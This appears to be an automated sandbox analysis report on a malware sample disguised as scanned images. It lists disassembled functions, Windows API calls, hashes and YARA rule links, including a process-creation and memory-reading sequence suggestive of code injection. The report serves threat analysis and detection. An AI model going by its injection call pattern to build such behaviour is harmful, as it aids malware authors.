                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Exception@8Throw$ExceptionRaise
                                                                                • String ID: Unknown exception
                                                                                • API String ID: 3476068407-410509341
                                                                                • Opcode ID: dc8dee81f49ce8fd17bcd1b0438ed9be92ada9b5d8fff9127f86f8566e498967
                                                                                • Instruction ID: 5220ed482f5407b49d237c55b34df547e405ade97d102bdbfef022d020e60072
                                                                                • Opcode Fuzzy Hash: dc8dee81f49ce8fd17bcd1b0438ed9be92ada9b5d8fff9127f86f8566e498967
                                                                                • Instruction Fuzzy Hash: 41F0283490020DB3CB10FA66E856CEE7B6C5F40314B60C17BB81C916D2FF39EA69C589
                                                                                Function 004D7F59 Relevance: 4.9, APIs: 3, Instructions: 430COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 004D82F5
                                                                                • TerminateProcess.KERNEL32(00000000), ref: 004D82FC
                                                                                • FreeLibrary.KERNEL32(?,?,?,?), ref: 004D84DD
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Process$CurrentFreeLibraryTerminate
                                                                                • String ID:
                                                                                • API String ID: 146820519-0
                                                                                • Opcode ID: b458891f9da7acd71ad8b933259d941050e7ec315a45ba24dd3ae5cbb10173f8
                                                                                • Instruction ID: ac5f4a77e193a34b63539ac69ebc604f016c63268ebb59eecd779cd5de319072
                                                                                • Opcode Fuzzy Hash: b458891f9da7acd71ad8b933259d941050e7ec315a45ba24dd3ae5cbb10173f8
                                                                                • Instruction Fuzzy Hash: 06125A71A083419FC714DF28C494B2ABBE5BF85318F04895EE8898B352DB39ED45CF96
                                                                                Function 004510F3 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00451BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00451BF4
                                                                                  • Part of subcall function 00451BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00451BFC
                                                                                  • Part of subcall function 00451BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00451C07
                                                                                  • Part of subcall function 00451BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00451C12
                                                                                  • Part of subcall function 00451BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00451C1A
                                                                                  • Part of subcall function 00451BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00451C22
                                                                                  • Part of subcall function 00451B4A: RegisterWindowMessageW.USER32(00000004,?,004512C4), ref: 00451BA2
                                                                                • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0045136A
                                                                                • OleInitialize.OLE32 ref: 00451388
                                                                                • CloseHandle.KERNEL32(00000000,00000000), ref: 004924AB
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                • String ID:
                                                                                • API String ID: 1986988660-0
                                                                                • Opcode ID: 69271b893cbdc8e795e9dacb0e5edc087d3e0a618cf964f531e4e2e0211c840d
                                                                                • Instruction ID: af38272d358302648d61d3e55cb7377ba26c97f0af2ec5e3653785c545e02c8c
                                                                                • Opcode Fuzzy Hash: 69271b893cbdc8e795e9dacb0e5edc087d3e0a618cf964f531e4e2e0211c840d
                                                                                • Instruction Fuzzy Hash: FE71A4B4A01A448E87A4DF7AA9856573AE0BFBA34571481BED40AC7272E734440BEF4D
                                                                                Function 004886AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CloseHandle.KERNELBASE(00000000,00000000,?,?,004885CC,?,00518CC8,0000000C), ref: 00488704
                                                                                • GetLastError.KERNEL32(?,004885CC,?,00518CC8,0000000C), ref: 0048870E
                                                                                • __dosmaperr.LIBCMT ref: 00488739
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: CloseErrorHandleLast__dosmaperr
                                                                                • String ID:
                                                                                • API String ID: 2583163307-0
                                                                                • Opcode ID: 71a1f6f2b23dc79ec7bc7eb4a5563044adddc391bc2dae2b8d7242c37dc129a5
                                                                                • Instruction ID: 356a3c93e517c8c4d6692af7eea8809ab1eaf1fb0300c6988788959f09af4ad1
                                                                                • Opcode Fuzzy Hash: 71a1f6f2b23dc79ec7bc7eb4a5563044adddc391bc2dae2b8d7242c37dc129a5
                                                                                • Instruction Fuzzy Hash: D0016B32A0526016C2307234688577F27594F92778F78091FFC14AB2D3EEAD9C82839C
                                                                                Function 00461310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __Init_thread_footer.LIBCMT ref: 004617F6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Init_thread_footer
                                                                                • String ID: CALL
                                                                                • API String ID: 1385522511-4196123274
                                                                                • Opcode ID: c16631baf9c16dd1017747c61b402fbe52ab9ef28b341d066764a09af67d8e91
                                                                                • Instruction ID: 10e9fc102b3395bf0d17a109ab266fdf0b4f2ec4b8cde5f4ddcce9dae578dd79
                                                                                • Opcode Fuzzy Hash: c16631baf9c16dd1017747c61b402fbe52ab9ef28b341d066764a09af67d8e91
                                                                                • Instruction Fuzzy Hash: 85228E746083419FC714DF15C480A2ABBF1BF96318F18895EF4968B362E739E845CB9B
                                                                                Function 00453837 Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00453908
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: IconNotifyShell_
                                                                                • String ID:
                                                                                • API String ID: 1144537725-0
                                                                                • Opcode ID: 95e534285d6c30a57fbb1856aa1cb269a7f67bbe4a953456d1f14b77794f2ce1
                                                                                • Instruction ID: a194c76246cf44fbb20a047d36fa0d4a6740170c72302b8bb6b697c6b90993b6
                                                                                • Opcode Fuzzy Hash: 95e534285d6c30a57fbb1856aa1cb269a7f67bbe4a953456d1f14b77794f2ce1
                                                                                • Instruction Fuzzy Hash: 3A31ABB05047009FD721EF24C884797BBE8FF6934AF00082EF99987241E775AA48CB5A
                                                                                Function 00455745 Relevance: 3.1, APIs: 2, Instructions: 56fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0045949C,?,00008000), ref: 00455773
                                                                                • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,0045949C,?,00008000), ref: 00494052
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID:
                                                                                • API String ID: 823142352-0
                                                                                • Opcode ID: 75554f7f6b60c566eee1e2f9ba8cf6f74f006ec25cc260133d6e2fda4d53b945
                                                                                • Instruction ID: 6a59bb58bbdbb774df2e3bce7d9d7b20860a496f8d97c8eb551585fb5d156f5f
                                                                                • Opcode Fuzzy Hash: 75554f7f6b60c566eee1e2f9ba8cf6f74f006ec25cc260133d6e2fda4d53b945
                                                                                • Instruction Fuzzy Hash: 6D019230145225B6E7300A2ACC4EFA77F98EF467B1F108311BE9C5E1E2C7B85855CB99
                                                                                Function 015717FD Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CreateProcessW.KERNELBASE(?,00000000), ref: 01571FBB
                                                                                • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01572051
                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01572073
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1707942713.0000000001570000.00000040.00000020.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_1570000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                • String ID:
                                                                                • API String ID: 2438371351-0
                                                                                • Opcode ID: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                                                                • Instruction ID: 1842425dff04eb1edea9fb49c849e2dbe0daa92399b1ec0d99f7f45e496b9654
                                                                                • Opcode Fuzzy Hash: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                                                                • Instruction Fuzzy Hash: 8612CD24E24658C6EB24DF64D8507DEB232FF68300F1094E9910DEB7A5E77A4F81CB5A
                                                                                Function 004D709C Relevance: 1.8, APIs: 1, Instructions: 326COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: LoadString
                                                                                • String ID:
                                                                                • API String ID: 2948472770-0
                                                                                • Opcode ID: 01488f938bb9973ca3890fee86f3ebac7d672feb01b0c577946b26e3d31847a8
                                                                                • Instruction ID: 75245c4c8cf406bdd3ecd79d7a2bdf86577935ea2a19f2bec762f6db601ba639
                                                                                • Opcode Fuzzy Hash: 01488f938bb9973ca3890fee86f3ebac7d672feb01b0c577946b26e3d31847a8
                                                                                • Instruction Fuzzy Hash: 5BD1AF34A04109EFCB14DF99C891DAEBBB5FF48314F14415BE805AB392E734AD86CB99
                                                                                Function 0046FC70 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: ProtectVirtual
                                                                                • String ID:
                                                                                • API String ID: 544645111-0
                                                                                • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                • Instruction ID: 86b00d174548248aa95afb6964475937ed2d9b86294878e834b81985e9400cc0
                                                                                • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                • Instruction Fuzzy Hash: 46311674A00109DBD718CF59E48096AF7A2FF49300B2482A6E84ACF755E735EDC5CBC6
                                                                                Function 00454ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00454E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00454EDD,?,00521418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00454E9C
                                                                                  • Part of subcall function 00454E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00454EAE
                                                                                  • Part of subcall function 00454E90: FreeLibrary.KERNEL32(00000000,?,?,00454EDD,?,00521418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00454EC0
                                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00521418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00454EFD
                                                                                  • Part of subcall function 00454E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00493CDE,?,00521418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00454E62
                                                                                  • Part of subcall function 00454E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00454E74
                                                                                  • Part of subcall function 00454E59: FreeLibrary.KERNEL32(00000000,?,?,00493CDE,?,00521418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00454E87
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Library$Load$AddressFreeProc
                                                                                • String ID:
                                                                                • API String ID: 2632591731-0
                                                                                • Opcode ID: 7f1896725e6cd02e8f20360d7be145f0021db3132b12ec6796fc009369927c22
                                                                                • Instruction ID: 7559ef5f32c1462cb249920424995085a12c2fae82e09cea11d34877515ad268
                                                                                • Opcode Fuzzy Hash: 7f1896725e6cd02e8f20360d7be145f0021db3132b12ec6796fc009369927c22
                                                                                • Instruction Fuzzy Hash: B011EB32600205ABCF14BF66DC53FAD77A59F8071AF10842FF942AE1C2DE789A499758
                                                                                Function 00488402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: __wsopen_s
                                                                                • String ID:
                                                                                • API String ID: 3347428461-0
                                                                                • Opcode ID: 5ee07bfb49be4b8602c249d6db26edc0cd981134cc95ac10a3e076f3ce2d367d
                                                                                • Instruction ID: 707ff21fd283d62cfe94f01590eb69c08462ab8dc3b1f63ce7ea99ed47bfc7df
                                                                                • Opcode Fuzzy Hash: 5ee07bfb49be4b8602c249d6db26edc0cd981134cc95ac10a3e076f3ce2d367d
                                                                                • Instruction Fuzzy Hash: 5F11067690410AAFCB15DF58E94199E7BF5EF48314F14446AF808AB312EB31DA118BA9
                                                                                Function 00485000 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00484C7D: RtlAllocateHeap.NTDLL(00000008,00451129,00000000,?,00482E29,00000001,00000364,?,?,?,0047F2DE,00483863,00521444,?,0046FDF5,?), ref: 00484CBE
                                                                                • _free.LIBCMT ref: 0048506C
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: AllocateHeap_free
                                                                                • String ID:
                                                                                • API String ID: 614378929-0
                                                                                • Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                                                                • Instruction ID: c202ef4b9e2d26cd0327584cae1278bd1c6062fe32b6d3e85916b71baa9777c4
                                                                                • Opcode Fuzzy Hash: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                                                                • Instruction Fuzzy Hash: 2F014E722047055BE3319F59D84195EFBECFB86370F25091EE184932C0EB746805C778
                                                                                Function 0047E602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                                                • Instruction ID: 2115e8e3ed21d20f8846de019e3ba887a20b6de552d706a6a26ecddba9e2821b
                                                                                • Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                                                • Instruction Fuzzy Hash: 79F0F932511A1096C6313A678D05BDB379C9F66338F508B5FF429922D2DB7C940286AD
                                                                                Function 00484C7D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RtlAllocateHeap.NTDLL(00000008,00451129,00000000,?,00482E29,00000001,00000364,?,?,?,0047F2DE,00483863,00521444,?,0046FDF5,?), ref: 00484CBE
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: AllocateHeap
                                                                                • String ID:
                                                                                • API String ID: 1279760036-0
                                                                                • Opcode ID: 1cbd61374e82b1f98089d0cedae2ddb59e9a10f81f367000b12e99a66338d011
                                                                                • Instruction ID: 2a4a85afa66b5eb24e1000e387a29c3226d2440dd910ee0b3d00e96032746266
                                                                                • Opcode Fuzzy Hash: 1cbd61374e82b1f98089d0cedae2ddb59e9a10f81f367000b12e99a66338d011
                                                                                • Instruction Fuzzy Hash: 88F0BB3160222667DB217F629C05B5F774CAFD1760B168917B819972C1CB38D801579C
                                                                                Function 00483820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RtlAllocateHeap.NTDLL(00000000,?,00521444,?,0046FDF5,?,?,0045A976,00000010,00521440,004513FC,?,004513C6,?,00451129), ref: 00483852
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: AllocateHeap
                                                                                • String ID:
                                                                                • API String ID: 1279760036-0
                                                                                • Opcode ID: e74e59de187e105619b91972772a3327fd729fd0791e10f123f8721425958373
                                                                                • Instruction ID: d63d6ae5dcf8e424601dc8d0ea21ae216a44ab9bf72d0364f4a5f26442a11b8a
                                                                                • Opcode Fuzzy Hash: e74e59de187e105619b91972772a3327fd729fd0791e10f123f8721425958373
                                                                                • Instruction Fuzzy Hash: ADE0A02120122457D6313F679C05BAF36C9AF82FB2B150827B818A66C1DB299D0283AD
                                                                                Function 00454F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FreeLibrary.KERNEL32(?,?,00521418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00454F6D
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
